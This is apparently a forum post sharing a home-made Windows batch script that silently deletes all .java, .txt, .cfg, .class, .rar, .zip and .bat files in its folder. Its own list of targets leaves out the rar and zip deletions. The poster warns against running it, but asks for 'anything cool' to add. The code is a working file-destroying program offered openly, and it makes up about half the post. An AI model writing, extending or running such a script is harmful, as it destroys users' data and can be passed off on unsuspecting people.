Okay, I was bored so I decided to make a code that deletes txt, class, cfg, java, and bat.
Note: PLEASE DO NOT SAVE THIS CODE AS A .BAT and RUN IT!!
Note2: I am not going to send this to anyone! Its just cuz im bored!
Please point out any mistakes, AND anything cool I could add.
And remember: always check batch files sent over the Internet before running them!!
Code:@echo off echo deleting .java files.. del *.java echo deleting txt files... del *.txt echo deleting .cfg files... del *.cfg echo deleting class files... del *.class echo deleting rar files... del *.rar echo deleing zip files... del *.zip echo deleting .bat files.. del *.bat

